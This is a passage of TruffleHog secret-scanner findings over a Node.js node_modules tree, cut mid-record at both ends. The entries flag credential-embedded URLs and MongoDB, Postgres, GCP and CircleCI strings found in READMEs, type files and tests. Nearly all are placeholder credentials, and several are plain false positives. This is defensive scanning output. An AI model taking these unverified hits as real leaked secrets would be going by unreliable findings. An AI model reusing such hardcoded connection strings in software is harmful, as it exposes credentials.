remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/@types/node/url.d.ts
line: 716
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 17
DetectorName: URI
DetectorDescription: This detector identifies URLs with embedded credentials,
which can be used to access web resources without explicit user interaction.
DecoderName: PLAIN
Verified: false
VerificationFromCache: false
Raw: https://abc:xyz@example.com
RawV2: https://abc:xyz@example.com
Redacted: https://abc:********@example.com
ExtraData: null
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f03f52d67f2ae961
ruleId: URI
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/@types/node/url.d.ts
startLine: 0
message: https://abc:123@example.com
title: URI secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/@types/node/url.d.ts
line: 557
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 17
DetectorName: URI
DetectorDescription: This detector identifies URLs with embedded credentials,
which can be used to access web resources without explicit user interaction.
DecoderName: PLAIN
Verified: false
VerificationFromCache: false
Raw: https://abc:123@example.com
RawV2: https://abc:123@example.com
Redacted: https://abc:********@example.com
ExtraData: null
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 71285c8155080cef
ruleId: URI
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/faye-websocket/README.md
startLine: 0
message: http://username:password@proxy.example.com
title: URI secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/faye-websocket/README.md
line: 122
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 17
DetectorName: URI
DetectorDescription: This detector identifies URLs with embedded credentials,
which can be used to access web resources without explicit user interaction.
DecoderName: PLAIN
Verified: false
VerificationError: 'lookup proxy.example.com on 192.168.65.7:53: no such host'
VerificationFromCache: false
Raw: http://username:password@proxy.example.com
RawV2: http://username:password@proxy.example.com
Redacted: http://username:********@proxy.example.com
ExtraData: null
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: cf9d5ac0f2fa1e76
ruleId: URI
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/firebase-admin/node_modules/@types/node/https.d.ts
startLine: 0
message: https://abc:xyz@example.com
title: URI secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/firebase-admin/node_modules/@types/node/https.d.ts
line: 429
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 17
DetectorName: URI
DetectorDescription: This detector identifies URLs with embedded credentials,
which can be used to access web resources without explicit user interaction.
DecoderName: PLAIN
Verified: false
VerificationFromCache: true
Raw: https://abc:xyz@example.com
RawV2: https://abc:xyz@example.com
Redacted: https://abc:********@example.com
ExtraData: null
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 40e557d25e059317
ruleId: URI
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/firebase-admin/node_modules/@types/node/http.d.ts
startLine: 0
message: http://abc:xyz@example.com
title: URI secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/firebase-admin/node_modules/@types/node/http.d.ts
line: 1817
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 17
DetectorName: URI
DetectorDescription: This detector identifies URLs with embedded credentials,
which can be used to access web resources without explicit user interaction.
DecoderName: PLAIN
Verified: false
VerificationFromCache: true
Raw: http://abc:xyz@example.com
RawV2: http://abc:xyz@example.com
Redacted: http://abc:********@example.com
ExtraData: null
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 919e333a335f73d4
ruleId: URI
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts
startLine: 0
message: https://abc:xyz@example.com
title: URI secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts
line: 736
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 17
DetectorName: URI
DetectorDescription: This detector identifies URLs with embedded credentials,
which can be used to access web resources without explicit user interaction.
DecoderName: ESCAPED_UNICODE
Verified: false
VerificationFromCache: true
Raw: https://abc:xyz@example.com
RawV2: https://abc:xyz@example.com
Redacted: https://abc:********@example.com
ExtraData: null
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: aa9f19a78a21fb70
ruleId: URI
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts
startLine: 0
message: https://123:xyz@example.com
title: URI secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts
line: 742
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 17
DetectorName: URI
DetectorDescription: This detector identifies URLs with embedded credentials,
which can be used to access web resources without explicit user interaction.
DecoderName: PLAIN
Verified: false
VerificationFromCache: true
Raw: https://123:xyz@example.com
RawV2: https://123:xyz@example.com
Redacted: https://123:********@example.com
ExtraData: null
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6d8ae777484be698
ruleId: URI
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts
startLine: 0
message: https://abc:123@example.com
title: URI secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts
line: 577
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 17
DetectorName: URI
DetectorDescription: This detector identifies URLs with embedded credentials,
which can be used to access web resources without explicit user interaction.
DecoderName: PLAIN
Verified: false
VerificationFromCache: true
Raw: https://abc:123@example.com
RawV2: https://abc:123@example.com
Redacted: https://abc:********@example.com
ExtraData: null
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 170043ac8ee06ba6
ruleId: GCP
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/google-auth-library/README.md
startLine: 0
message: your-client-email
title: GCP secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/google-auth-library/README.md
line: 323
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 6
DetectorName: GCP
DetectorDescription: GCP (Google Cloud Platform) is a suite of cloud computing
services that runs on the same infrastructure that Google uses internally for
its end-user products. GCP keys can be used to access and manage these services.
DecoderName: PLAIN
Verified: false
VerificationError: 'private key should be a PEM or plain PKCS1 or PKCS8; parse
error: asn1: structure error: tags don''t match (16 vs {class:1 tag:25 length:111
isCompound:true}) {optional:false explicit:false application:false private:false
defaultValue:<nil> tag:<nil> stringType:0 timeType:0 set:false omitEmpty:false}
pkcs1PrivateKey @2'
VerificationFromCache: false
Raw: your-client-email
RawV2: '{"type":"service_account","project_id":"your-project-id","private_key_id":"your-private-key-id","private_key":"your-private-key","client_email":"your-client-email","client_id":"your-client-id","auth_uri":"https://accounts.google.com/o/oauth2/auth","token_uri":"https://accounts.google.com/o/oauth2/token","auth_provider_x509_cert_url":"https://www.googleapis.com/oauth2/v1/certs","client_x509_cert_url":"your-cert-url"}'
Redacted: your-client-email
ExtraData:
private_key_id: your-private-key-id
project: your-project-id
rotation_guide: https://howtorotate.com/docs/tutorials/gcp/
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d5d31157dd10c1ff
ruleId: Circle
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/ip-address/README.md
startLine: 0
message: 7baede7efd3db5f1f25fb439e97d5f695ff76318
title: Circle secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/ip-address/README.md
line: 1
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 4
DetectorName: Circle
DetectorDescription: CircleCI is a continuous integration and delivery platform
used to build, test, and deploy software. CircleCI tokens can be used to interact
with the CircleCI API and access various resources and functionalities.
DecoderName: PLAIN
Verified: false
VerificationFromCache: false
Raw: 7baede7efd3db5f1f25fb439e97d5f695ff76318
RawV2: ''
Redacted: ''
ExtraData:
Version: '1'
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7196c7e679641da3
ruleId: MongoDB
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/prisma/build/index.js
startLine: 0
message: mongodb+srv://root:randompassword@cluster0.ab1cd.mongodb.net/mydb?retryWrites=true&w=majority
title: MongoDB secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/prisma/build/index.js
line: 1568
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 895
DetectorName: MongoDB
DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented
data model. MongoDB credentials can be used to access and manipulate the database.
DecoderName: PLAIN
Verified: false
VerificationError: 'lookup _mongodb._tcp.cluster0.ab1cd.mongodb.net on 192.168.65.7:53:
no such host'
VerificationFromCache: false
Raw: mongodb+srv://root:randompassword@cluster0.ab1cd.mongodb.net/mydb?retryWrites=true&w=majority
RawV2: ''
Redacted: ''
ExtraData:
rotation_guide: https://howtorotate.com/docs/tutorials/mongo/
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f4471d3670e3b099
ruleId: MongoDB
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/keyv/README.md
startLine: 0
message: mongodb://user:pass@localhost:27017/dbname
title: MongoDB secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/keyv/README.md
line: 58
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 895
DetectorName: MongoDB
DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented
data model. MongoDB credentials can be used to access and manipulate the database.
DecoderName: PLAIN
Verified: false
VerificationError: context deadline exceeded
VerificationFromCache: false
Raw: mongodb://user:pass@localhost:27017/dbname
RawV2: ''
Redacted: ''
ExtraData:
rotation_guide: https://howtorotate.com/docs/tutorials/mongo/
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d837ea8fcf1f8062
ruleId: URI
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/websocket-driver/README.md
startLine: 0
message: http://username:password@proxy.example.com
title: URI secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/websocket-driver/README.md
line: 177
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 17
DetectorName: URI
DetectorDescription: This detector identifies URLs with embedded credentials,
which can be used to access web resources without explicit user interaction.
DecoderName: PLAIN
Verified: false
VerificationError: 'lookup proxy.example.com on 192.168.65.7:53: no such host'
VerificationFromCache: true
Raw: http://username:password@proxy.example.com
RawV2: http://username:password@proxy.example.com
Redacted: http://username:********@proxy.example.com
ExtraData: null
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0a6439395ad23821
ruleId: URI
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/zod/src/v4/classic/tests/string.test.ts
startLine: 0
message: https://anonymous:flabada@developer.mozilla.org
title: URI secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/zod/src/v4/classic/tests/string.test.ts
line: 307
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 17
DetectorName: URI
DetectorDescription: This detector identifies URLs with embedded credentials,
which can be used to access web resources without explicit user interaction.
DecoderName: PLAIN
Verified: false
VerificationFromCache: false
Raw: https://anonymous:flabada@developer.mozilla.org
RawV2: https://anonymous:flabada@developer.mozilla.org/en
Redacted: https://anonymous:********@developer.mozilla.org/en
ExtraData: null
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 1dff4f66e83b2b09
ruleId: Postgres
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/is-url/test/index.js
startLine: 0
message: postgres://u:p@example.com:5702
title: Postgres secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/is-url/test/index.js
line: 68
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 968
DetectorName: Postgres
DetectorDescription: Postgres connection string containing credentials
DecoderName: PLAIN
Verified: false
VerificationError: i/o timeout
VerificationFromCache: false
Raw: postgres://u:p@example.com:5702
RawV2: postgres://u:p@example.com:5702
Redacted: ''
ExtraData:
sslmode: <unset>
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 849f8848e4b2049c
ruleId: GitHubOauth2
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md
startLine: 0
message: showCompletionScript
title: GitHubOauth2 secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md
line: 164
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 924
DetectorName: GitHubOauth2
DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize
applications to access GitHub's API on behalf of a user or organization. These
credentials include a client ID and client secret, which can be used to obtain
access tokens for accessing GitHub resources.
DecoderName: PLAIN
Verified: false
VerificationFromCache: false
Raw: showCompletionScript
RawV2: showCompletionScript027a6365b737e13116811a8ef43670196e1fa00a
Redacted: ''
ExtraData:
rotation_guide: https://howtorotate.com/docs/tutorials/github/
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9afc5113c741a56f
ruleId: MongoDB
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
startLine: 0
message: mongodb://username:password@host:1234
title: MongoDB secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
line: 644
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 895
DetectorName: MongoDB
DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented
data model. MongoDB credentials can be used to access and manipulate the database.
DecoderName: PLAIN
Verified: false
VerificationError: context deadline exceeded
VerificationFromCache: false
Raw: mongodb://username:password@host:1234
RawV2: ''
Redacted: ''
ExtraData:
rotation_guide: https://howtorotate.com/docs/tutorials/mongo/
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 917b9a33e85655cd
ruleId: MongoDB
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
startLine: 0
message: mongodb://username:password@host:1234/defaultauthdb
title: MongoDB secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
line: 646
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 895
DetectorName: MongoDB
DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented
data model. MongoDB credentials can be used to access and manipulate the database.
DecoderName: PLAIN
Verified: false
VerificationError: context deadline exceeded
VerificationFromCache: false
Raw: mongodb://username:password@host:1234/defaultauthdb
RawV2: ''
Redacted: ''
ExtraData:
rotation_guide: https://howtorotate.com/docs/tutorials/mongo/
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 31f0bf34095c5b38
ruleId: MongoDB
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
startLine: 0
message: mongodb://username:password@host:1234/defaultauthdb?authSource=admin
title: MongoDB secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
line: 647
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 895
DetectorName: MongoDB
DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented
data model. MongoDB credentials can be used to access and manipulate the database.
DecoderName: PLAIN
Verified: false
VerificationError: context deadline exceeded
VerificationFromCache: false
Raw: mongodb://username:password@host:1234/defaultauthdb?authSource=admin
RawV2: ''
Redacted: ''
ExtraData:
rotation_guide: https://howtorotate.com/docs/tutorials/mongo/
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 1dda63967d05f07b
ruleId: MongoDB
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
startLine: 0
message: mongodb://username:password@host:1234/defaultauthdb?authSource=admin&connectTimeoutMS=300000
title: MongoDB secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
line: 649
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 895
DetectorName: MongoDB
DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented
data model. MongoDB credentials can be used to access and manipulate the database.
DecoderName: PLAIN
Verified: false
VerificationError: context deadline exceeded
VerificationFromCache: false
Raw: mongodb://username:password@host:1234/defaultauthdb?authSource=admin&connectTimeoutMS=300000
RawV2: ''
Redacted: ''
ExtraData:
rotation_guide: https://howtorotate.com/docs/tutorials/mongo/
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9491b5fd54f57cb2
ruleId: MongoDB
severity: MEDIUM
tool:
name: trufflehog
